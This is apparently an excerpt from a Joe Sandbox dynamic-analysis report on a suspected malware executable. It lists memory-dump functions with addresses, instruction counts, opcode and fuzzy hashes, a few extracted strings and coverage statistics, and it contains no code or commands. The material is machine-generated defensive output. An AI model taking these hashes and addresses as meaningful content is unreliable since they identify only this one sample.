Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6246ae2b2acda5a4e7a67e197b10752c7e3267cf31d35539145553318a243a
Instruction ID: 7becd0b31268ba55b8e6d9ef9f045e2b894084a006f1fa9d1f3391d6e2e32c91
Opcode Fuzzy Hash: 6c6246ae2b2acda5a4e7a67e197b10752c7e3267cf31d35539145553318a243a
Instruction Fuzzy Hash: 18E0BD9244E7C45FE30387206C6A8C23FA0A94721430A06C7C480DF0A3E1188BAA9362

Function 00007FFD9BAF2731 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

R, xrefs: 00007FFD9BAF3170
T, xrefs: 00007FFD9BAF2323
4, xrefs: 00007FFD9BAF273F
a, xrefs: 00007FFD9BAF3192

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: 4$R$T$a
API String ID: 0-2417396697
Opcode ID: f03cd19f9107265ec37dea1a017cfc60184eb299b0040d30a4455826a5bab0ac
Instruction ID: af93eb93e9bfb226cb3ba14fa273c6577e544a933d5213709cf24fb7ef6841bc
Opcode Fuzzy Hash: f03cd19f9107265ec37dea1a017cfc60184eb299b0040d30a4455826a5bab0ac
Instruction Fuzzy Hash: 7A216BB0F0965D8BEB64DF80C4943FDBBF1EF68315F144179C009A62A1CEB86A84CB10

Function 00007FFD9BB00DF9 Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

., xrefs: 00007FFD9BB00E35
', xrefs: 00007FFD9BB009D9
?, xrefs: 00007FFD9BB00A07
2, xrefs: 00007FFD9BB00E0D

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: '$.$2$?
API String ID: 0-982240037
Opcode ID: f004a52975025e98e84062fa4db6c98fcd8e69b3d1ab4bb57ae156a23f416fbe
Instruction ID: 7eef3321ded8491287d19b8c00e4aaa76eb7e8f9ad1085996d5c5d57bbe3186b
Opcode Fuzzy Hash: f004a52975025e98e84062fa4db6c98fcd8e69b3d1ab4bb57ae156a23f416fbe
Instruction Fuzzy Hash: B9110A30A0921ACAE7A5DF14C8987A877F5EB14715F1181FAC40EA62A1DFB85AC8CF01

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 7992, Parent PID: 7768COMMON

Executed Functions

Function 00007FFD9BAC0D70 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12102e2f2483a6c53cb7ddc73a3be6d6e765b43a0bfee0f765c3a611efb88460
Instruction ID: 13dfd2c03f2c06013c3e54e9ad5971327794279ebffd313eae81693e963c442d
Opcode Fuzzy Hash: 12102e2f2483a6c53cb7ddc73a3be6d6e765b43a0bfee0f765c3a611efb88460
Instruction Fuzzy Hash: 58919FB1A1AA8D8FE7A8DB68C8657A97FE1EF59314F0002BAD04AD72D6CB781511C740

Function 00007FFD9BAC4DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFD9BAC4E35

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: 9aa729c432961da6460181aaa81f4f7338fa3cd5bd24a5f8a94f43668e81e4b5
Instruction ID: 7ae348a7fecf5417598cc896ba9ff680791255c95e12c12ae06efeecb582b53e
Opcode Fuzzy Hash: 9aa729c432961da6460181aaa81f4f7338fa3cd5bd24a5f8a94f43668e81e4b5
Instruction Fuzzy Hash: 02112B70F059598FEB74EB18CC546E9B7B1EB94316F1042E6D40DE32A5DE782E818F44

Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9ca393e63e8650d002e27ef99c37ecc0233b44baaba73fac3016963450a65a
Instruction ID: 94b809b1be10bc877ceeee558ac1576ef72c2281b58422d59a6d64190a3db1b4
Opcode Fuzzy Hash: 1f9ca393e63e8650d002e27ef99c37ecc0233b44baaba73fac3016963450a65a
Instruction Fuzzy Hash: 2451B131A0951D8FDB54FFA8D4A5AFDBBA0EF58329F0402BBE40DD7196DE24A441C784

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a87a4a4bc656eb943258d909fba0352a87576746b07f901bd6c9d25e4fc17b
Instruction ID: 274750b2ab0a0705b4fc04ab0ce7325f15d585288ee5ad57a781f177ba3ec2a4
Opcode Fuzzy Hash: 19a87a4a4bc656eb943258d909fba0352a87576746b07f901bd6c9d25e4fc17b
Instruction Fuzzy Hash: DE41FB70A1491D8FDB94EF98C495AEDBBB1FF68705F400179D40DE32A5DA74A9418B40

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c51e1eed4d73d2418a5ea03e324723db99e2632d364d9d843ce1e3a6f092d68d
Instruction ID: 9814a91d8a9802e228fe99c536c5f4dafb278ed0e4b2bd8a705adebf1702e005
Opcode Fuzzy Hash: c51e1eed4d73d2418a5ea03e324723db99e2632d364d9d843ce1e3a6f092d68d
Instruction Fuzzy Hash: F0210675B0E28D8BE722ABA8CC212FD7B60EF52310F0606B7C1549B1E3CA7816058B95

Function 00007FFD9BAC5F11 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547ce44d721a9c0dc18d57df5b53001e294b3f5a5a6203a5dfeeff4fa8fe2fdd
Instruction ID: ad8b91ecd6b68bbf6337a1d19e2d39c3488d5c3c139d0c1287be332979274015
Opcode Fuzzy Hash: 547ce44d721a9c0dc18d57df5b53001e294b3f5a5a6203a5dfeeff4fa8fe2fdd
Instruction Fuzzy Hash: 98317770D0D62D8EDBB9EB55C8697F8B6B1FB54341F4141E9D00DA32A1DBB86A84CF01

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219d0d7ce2332e67fbfc53ae9244a477f0a35a4ac254da6fe2ef6a9ce55df73d
Instruction ID: 824e0772f72ba2679706116f9c935465569975cc7440a11d953c160454e8c764
Opcode Fuzzy Hash: 219d0d7ce2332e67fbfc53ae9244a477f0a35a4ac254da6fe2ef6a9ce55df73d
Instruction Fuzzy Hash: 9F110835B0E68D8EE722ABA8C8212F97B70EF42710F0546B3D0549B1E3DA781605C795

Function 00007FFD9BAC5D16 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a025295970f3a914fa3aef8dccbecdc0acb4f479d47a2373001f83efc35942a
Instruction ID: 240c2b1dff7da6c25fd3c5befeefd0307fa827e76a14839684fe4f102cd7b3a2
Opcode Fuzzy Hash: 7a025295970f3a914fa3aef8dccbecdc0acb4f479d47a2373001f83efc35942a
Instruction Fuzzy Hash: 4121BC70E0A62E8EDBB5EB55C8553F8B6B1FB14301F5141F9E00DA36A1DBB86B808F01

Function 00007FFD9BAC5D1B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
Instruction ID: e8f1b9112063d15e220148bf158dde59b69b7fab7e6d2e5a81dc55bd95866698
Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
Instruction Fuzzy Hash: BE21A570E1A22D8EDBB5EB65C8597B8B6F0EB14301F5140F9940DA32A1DBB86B80DF00

Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acec0f840a847c9ad07848dd61d817e557d2c4c9255f59929b157a59805c0897
Instruction ID: eecac0b582fffa0cd64ba109b4d3198765ac1f97dd507968d38087f7a1ac4611
Opcode Fuzzy Hash: acec0f840a847c9ad07848dd61d817e557d2c4c9255f59929b157a59805c0897
Instruction Fuzzy Hash: 4C112975B0E28D8FE722ABA4C8202F97B70EF42310F0546B7D055DB1E3CA782604CB95

Function 00007FFD9BC82799 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1fad5c64d3205a86ef53467f5c06862bf3dca19369a99d284d4e023cb2dd4f4
Instruction ID: 2bb48e4ffe75b093a07d18cb7de10a19cb025e65ce5867b05e6912eb6c220bdc
Opcode Fuzzy Hash: d1fad5c64d3205a86ef53467f5c06862bf3dca19369a99d284d4e023cb2dd4f4
Instruction Fuzzy Hash: F311A13090968D8FCB85DF68C8589ED7BF0FF29300F0501AAE859C71A2DB34EA54CB81

Function 00007FFD9BC82949 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea01a38638022a53995b3ce983be5ee43d5c4a338f90cafce8a599421af6f204
Instruction ID: 83671c53feee78bc1efa91bb69a66c4ec869e3a96fea60474b6f60066d6e1c18
Opcode Fuzzy Hash: ea01a38638022a53995b3ce983be5ee43d5c4a338f90cafce8a599421af6f204
Instruction Fuzzy Hash: EE01803090968D8FDB45DF68C8999D97FF0FF19300F0501AAE449C71A2CB34A945CB81

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd99bffe3422e0352133d55045b6a9462904fe31d7f7726e5ddfb3b19ff2f4c6
Instruction ID: 38e7713c29fd27553a70ea2a616d354106b12af010b1ee1ca04318c566fd6e26
Opcode Fuzzy Hash: dd99bffe3422e0352133d55045b6a9462904fe31d7f7726e5ddfb3b19ff2f4c6
Instruction Fuzzy Hash: 15110475A0E28D8FE722ABA4C8202E97B70EF42310F0541B7D055DB1E3CA786614CB95

Function 00007FFD9BC82AE9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb4fa40969e5383a62b023b62641cdae1626fc6b45d14cc31b77c290bfd8653
Instruction ID: 36855d135b92ae86994361e00611f1861bccacaf398bb779670cdd3ceea7bd43
Opcode Fuzzy Hash: 0eb4fa40969e5383a62b023b62641cdae1626fc6b45d14cc31b77c290bfd8653
Instruction Fuzzy Hash: 4C015E30908A4D8FDF85EF68C858AAE7BF0FF29305F05019BE419C72A1DB349594CB40

Function 00007FFD9BC81A69 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e1b4daebfd0273f931c14d29ab5d3a9feb2587672c5a452601c24933a20842
Instruction ID: 14568972b65642262f21d9343fe16e953abb2db4ee146b4dadfc1143501cc091
Opcode Fuzzy Hash: 01e1b4daebfd0273f931c14d29ab5d3a9feb2587672c5a452601c24933a20842
Instruction Fuzzy Hash: 87014C30909A8C8FCB45EF28C869AD97FF0FF69301F0541AAE448C71A1D734D994CB81

Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 146718c6698bea95f6a3958c89ef305310bbc5bac279e5fece9bf3a75e98f5ad
Instruction ID: d6fd2d6ad582f9b8f6831541fad52faaa2696b4bd6a4d0e2cfe1e6488b65299b
Opcode Fuzzy Hash: 146718c6698bea95f6a3958c89ef305310bbc5bac279e5fece9bf3a75e98f5ad
Instruction Fuzzy Hash: 4501F174A0E28E8FE722ABA4C8642F97B70EF06310F0502B7D455DB2E3CA786614C745

Function 00007FFD9BC82F59 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f48e85c2c42eb3c1b7572496af55f9ffe2575b6184c73c8b2a1ec78576f1fd1f
Instruction ID: ec8e09e11f8cd8b003e37d8f8dece936d6de8cc4e0649245e20823c4127ddb6e
Opcode Fuzzy Hash: f48e85c2c42eb3c1b7572496af55f9ffe2575b6184c73c8b2a1ec78576f1fd1f
Instruction Fuzzy Hash: F0016270909A8D8FCB55DF64C894ADD7FB0FF59300F0541EAD409C71A1DB359995CB41

Function 00007FFD9BC81B39 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1868310494.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bc80000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d45ad15775f5c0551385c5c6734e84ddb20527a1711f7e6c5fcb3ebf8fa290d
Instruction ID: 630d3589bd7dd9bf336f43a33ce1a905c3167cb870ad8bd4b41b0ea48dc74291
Opcode Fuzzy Hash: 3d45ad15775f5c0551385c5c6734e84ddb20527a1711f7e6c5fcb3ebf8fa290d
Instruction Fuzzy Hash: F2018F30908A8C8FCB85DF68C868AA97FF0FF29301F0540DBD448C71A2D7349994CB80

Function 00007FFD9BAC0B9D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a0a22c8b51a0a9fe70fe46a1e816d9e32f95b936aac6b67b84316c7e40ac33
Instruction ID: 3f693a3c0d3cf065dfd1ec3adf3b12f4ac5885332d0fa3d3ab4bc46b528b8b08
Opcode Fuzzy Hash: 01a0a22c8b51a0a9fe70fe46a1e816d9e32f95b936aac6b67b84316c7e40ac33
Instruction Fuzzy Hash: 1801E430A2864DCFCB84EF58C881AA97BE0FB58304F010569E85DD3250CB30E960CB81

Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b448e7ed4720c72094fd4a621710063b95a51273e1fa1af93f8586ebff385649
Instruction ID: 62f542a4606ad4631725c922c843277b35b5b5c0fd4ecaa9d9f0e487e7c2c9c0
Opcode Fuzzy Hash: b448e7ed4720c72094fd4a621710063b95a51273e1fa1af93f8586ebff385649
Instruction Fuzzy Hash: E3F03030A0560E9FEB60FF98D4596FE77A0FF94700F110536E41CC21A0DA74A690CB84

Function 00007FFD9BAC1300 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d640a6b6a3ad5916b8d52520266c0a46307bfc2493234ba8c769531a1ff6e3
Instruction ID: 1a2964503881c3e2b01bfe5f1dd4646507e1296ed05211b71c88a79c4d295269
Opcode Fuzzy Hash: 09d640a6b6a3ad5916b8d52520266c0a46307bfc2493234ba8c769531a1ff6e3
Instruction Fuzzy Hash: 4EF0BD34A14A4DDFDF94EF58C449AAA7BE0FF68304F014566F81CC3260D630E594CB80

Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7cc4ecc5694291aff45325c236fa593ac7dc4645aaf8afae5e56d78955b173f
Instruction ID: c871dd632fefe681881f93676a9b66165cb92f4735bc6feb6b4935d24408eb69
Opcode Fuzzy Hash: c7cc4ecc5694291aff45325c236fa593ac7dc4645aaf8afae5e56d78955b173f
Instruction Fuzzy Hash: 87F0123091564D9FDB90EFA4C4596FE77E0FF54304F014576E81DD2160DB74A6A0CB80

Function 00007FFD9BAC1685 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f09da792e8df8290730015a41aaec6d5cdf4fb52d8a4e9aaae43508917d8ba89
Instruction ID: 1b860be2038a97164e5b2a9ea8233a9032ad7a7e04917e34cf3c7d794fb7f84d
Opcode Fuzzy Hash: f09da792e8df8290730015a41aaec6d5cdf4fb52d8a4e9aaae43508917d8ba89
Instruction Fuzzy Hash: 86F03935A1A64D9BDB20FFA8DD116EEB7A0FF85300F040676E46CC3191EA75A728CB41

Function 00007FFD9BAC0CCF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726f0374d5d92206df73d5b853f2f89d99a4a17f2996c56a1f032e0b95970057
Instruction ID: 096daeb44df12cf7c6127f0703286f73903b698a50f3ab11a13c297efa31e4ce
Opcode Fuzzy Hash: 726f0374d5d92206df73d5b853f2f89d99a4a17f2996c56a1f032e0b95970057
Instruction Fuzzy Hash: 54F06270B0E61A8BE768EB94C8946FD73B0BF54710F04067AD019932E2CBB86640CB45

Function 00007FFD9BAC70E6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
Instruction ID: e66950f0cd48364ad4e6937e7c0ead79da579c483d525b8c684c8038a2040f03
Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
Instruction Fuzzy Hash: A1F0B270A0A51A8AFB74AB94C8543BDB7A0EF95300F2050A9914EA3392DE785A858F49

Function 00007FFD9BAC6B59 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af191beca17b59e94d1906994fd6b3976a14d86cb9926fc5565a9509fdb9e852
Instruction ID: 8f99233baa0eff662f97ba79b62a48c18d749a11543056582ddae5ba9f7bfc19
Opcode Fuzzy Hash: af191beca17b59e94d1906994fd6b3976a14d86cb9926fc5565a9509fdb9e852
Instruction Fuzzy Hash: 7FE08C31E2866C89EBA8EB20C854AFCB3B1EF64300F4045FB800EB2095DEB41A808F00

Non-executed Functions

Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9BAC0B56
#{9, xrefs: 00007FFD9BAC0B3E
"s9, xrefs: 00007FFD9BAC0B46
!k9, xrefs: 00007FFD9BAC0B4E

Memory Dump Source

Source File: 0000000B.00000002.1866815897.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bac0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: ca574d917f0323569489406f8e35bf5f0aaed7d5b679bc6698c953b607373998
Instruction ID: 63cb17ad01071c9235c84109ef2372b78ad183a37b1d5cd27c51aac010d7efe8
Opcode Fuzzy Hash: ca574d917f0323569489406f8e35bf5f0aaed7d5b679bc6698c953b607373998
Instruction Fuzzy Hash: 9E415C16B0A46A45E339B7ED78219FD6B448FA933FB0843B7F85E8E0D74D486085C2D9

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 4960, Parent PID: 8072COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BADBD2D Relevance: 1.8, Instructions: 1809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9badb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1a40583a88442879ccef7f09c9e00dd81e8469b28136760365d29352100467
Instruction ID: 05c1f80e9974413fca2bf2e0f83d82bcbb2a75332e93cb2fad017ac2c0201f1a
Opcode Fuzzy Hash: 9b1a40583a88442879ccef7f09c9e00dd81e8469b28136760365d29352100467
Instruction Fuzzy Hash: 16F22070E1996D8FEBA8DB58C8A5BA8B7B1FF58310F4402F9D04DD7291DA746A81CF40

Function 00007FFD9BB2CB41 Relevance: .5, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1978412640.00007FFD9BB1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9bb1f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3435e2fcf962ff6149c8c25c7d3337016870ca95c62fc415ab38fbae050908
Instruction ID: bbb7b6aa1ba11350490f428540659f2cd0ecfce59060a196bf7a6ee8ca25b4c3
Opcode Fuzzy Hash: fb3435e2fcf962ff6149c8c25c7d3337016870ca95c62fc415ab38fbae050908
Instruction Fuzzy Hash: 7F121D70A19A5D8FDBA4DB58C8A5BE8B7E1FF68304F0101EAD41DE3291DE346A85CB40

Function 00007FFD9BB0A4C7 Relevance: .4, Instructions: 406
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

